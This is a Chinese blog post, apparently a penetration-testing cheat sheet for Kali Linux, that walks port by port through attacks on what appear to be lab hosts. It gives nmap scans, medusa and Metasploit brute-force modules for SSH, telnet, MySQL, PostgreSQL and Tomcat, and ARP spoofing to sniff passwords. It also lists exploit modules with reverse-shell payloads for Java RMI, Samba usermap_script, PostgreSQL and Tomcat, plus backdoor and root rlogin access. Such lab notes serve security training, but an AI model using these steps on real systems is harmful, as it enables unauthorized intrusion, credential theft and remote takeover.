kali对常见端口的漏洞破解收录

1.web应用漏洞扫描
	1).Owasp-zap(扫描漏洞)
	2).nikto(漏洞扫描)
	 nikto +host +"destip"
	3).sqlmap(sql注入)
	
2.TCP漏洞利用
	1).使用Nmap进行端口扫描
	 nmap -p 21 "destip"
	2).使用nc进行ftp链接
	 nc “destip”
	 
3.TCP密码暴力破解
	1).medusa
	  Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

4.TCP用户名明文密码嗅探
	1).arpspoof(对正在进行TCP链接的两台机器进行ARP嗅探)
	 arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
	2).wireshark(对两台正在进行TCP链接的两台及其进行数据监控进而获取用户名和密码)
	
5.ssh环境搭建

6.ssh-Banner信息的获取
	1).nmap
	 nmap -sV -p 22 + “destip”
	2).metaspolit
	  2.1).msfconsole以终端的形式启动metaspolit
	  2.2).use auxiliary/scanner/ssh/ssh_version 
	  2.3).set rhosts 192.168.37.142
	  2.4).run
	
	3).nc +"destip" +"端口号"

7.通过修改配置文件,可以使别人无法获取ubuntu的版本信息
 	1).sudo gedit sshd_config
 	2).重启服务
1.ssh弱口令破解
	1).medusa
	 Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M mod
	2).metasploit
	  2.1).msfconsole
	  2.2).使用use auxiliary/scanner/ssh/ssh_login
	  2.3).set rhosts 192.168.37.142
	  2.4).set username lzs
	  2.5).set password 123456
	  2.6).run
	3).通过metasploit获取meterpreter shell
	
2.ssh漏洞防护
	1.修改sshd_config(ctrl+f 搜索port修改ssh的端口)
	sudo gedit /etc/sshd_config

3.telnet信息获取
	1).使用namp对telnet进行版本获取
	 nmap -p 23 -sV 192.168.37.142
	2).使用metasploit进行版本获取
	 2.1).msfconsole
	 2.2).use auxiliary/scanner/telnet/telnet_version 
	 2.3).set rhost 192.168.37.142
	 2.4).run

4.telnet暴力密码破解
	1.使用metasploit进行破解
	  1.1).msgconsole
	  1.2).use auxiliary/scanner/telnet/telnet_login
	  1.3).show options查看需要设置的参数
	  1.4).set user + 用户名 --设置用户名
	  1.5).set pass_file + 目标文件 --设置用户字典
	  1.6).set threads 10 设置线程数
	  1.7).run 运行
	  
5.rmi漏洞
	1).使用nmap进行端口扫描
	  nmap -p 1099 -sV 192.168.1.9
	2).使用metasploit进行漏洞攻击
	  2.1).msfconsole
	  2.2).use exploit/multi/misc/java_rmi_server 
	  2.3).set rhost
	  2.4).set payload java/meterpreter/reverse_tcp
	  2.5).exploit
	  
6.后门漏洞
	1.使用nmap进行端口扫描
	 nmap -p 1524 -sV 192.168.1.9
	2).使用nc进行链接
	 nc 192.168.1.9 1524
	 	  

7.nfs漏洞
	1.使用nmap端口扫描
	 nmap -p 2049 192.168.37.142
	2).如果nfs配置不当,对方能对本机上的所有文件进行操作
1.rpcbind信息泄漏
	1).nmap对111端口扫描获取信息
	 nmap -p 111 -sV 192.168.37.142
	2).nmap脚本对111进行脚本探测
	 nmap -p 111 --script=rpcinfo 192.168.37.142
	3).metasploit进行端口扫描
	 3.1).msfconsole
	 3.2).use auxiliary/scanner/misc/sunrpc_portmapper
	 3.3).set rhost
	 3.4).run
	
2.samba RCE远程命令执行漏洞利用(111端口漏洞)
	1.metasploit
	 1.1).msfconsole
	 1.2).use exploit/multi/samba/usermap_script 
	 1.3).set rhost
	 1.4).set payload cmd/unix/reverse
	 1.5).exploit(获取shell)
	 
3.rlogin最高权限登录(需要目标开放512513端口)
	1.使用namp对512513端口进行扫描
	2.rlogin登录
	 rlogin -l root 192.168.37.142
	
1.proftp测试
	1.1).namp进行端口扫描
	 nmap -p 2121 -sV 192.168.37.140
	1.2.msf密码破解
	 1).使用matesploit进行破解
	 
2.mysql弱口令破解
	1.1.nmap进行端口扫描
	 nmap -p 3306 -sV 192.168.37.140
	1.2).msf进行密码破解
	  1.2.1).msfconsole
	  1.2.2).use auxiliary/scanner/mysql/mysql_login(使用这个模块进行破解)
	  1.2.3.设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
	1.3).通过mysql进行登录
	  mysql -h 192.168.37.140 -u root
	1.4).操作mysql的数据
	
3.postgresql数据库密码破解
	1.1).nmap进行端口扫描
	 nmap -p 5432 -sV 192.168.37.140
	1.2).msf进行暴力破解
	  1.2.1).msfconsole
	  1.2.2).use auxiliary/scanner/postgres/postgres_login使用这个模块进行破解)
	  1.2.3.设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
	1.3).使用msf获取shell
	  1.3.1).msfconsole
	  1.3.2).use exploit/linux/postgres/postgres_payload 使用这个模块进行破解)
	  1.3.3.设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
	  1.3.4).exploit
	 
4.vnc密码破解
	searchsploit vnc进行版本漏洞查询
	同上面端口漏洞操作步骤!!!
	
5.irc密码破解
	searchsploit irc进行版本漏洞查询
	同上面端口漏洞操作步骤!!!
	
6.tomcat密码破解
	1.1).nmap进行端口扫描
	 nmap -p 8180 -sV 192.168.37.140
	1.2).msf进行暴力破解
	  1.2.1).msfconsole
	  1.2.2).use auxiliary/scanner/http/tomcat_mgr_login 使用这个模块进行破解)
	  1.2.3.设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
	1.3).使用msf获取shell
	  1.3.1).msfconsole
	  1.3.2).use exploit/linux/postgres/tomcat_mgr_deploy 使用这个模块进行破解)
	  1.3.3.设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
	  1.3.4).exploit	


7.redis密码破解
	原理同上
  • 5
    点赞
  • 59
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值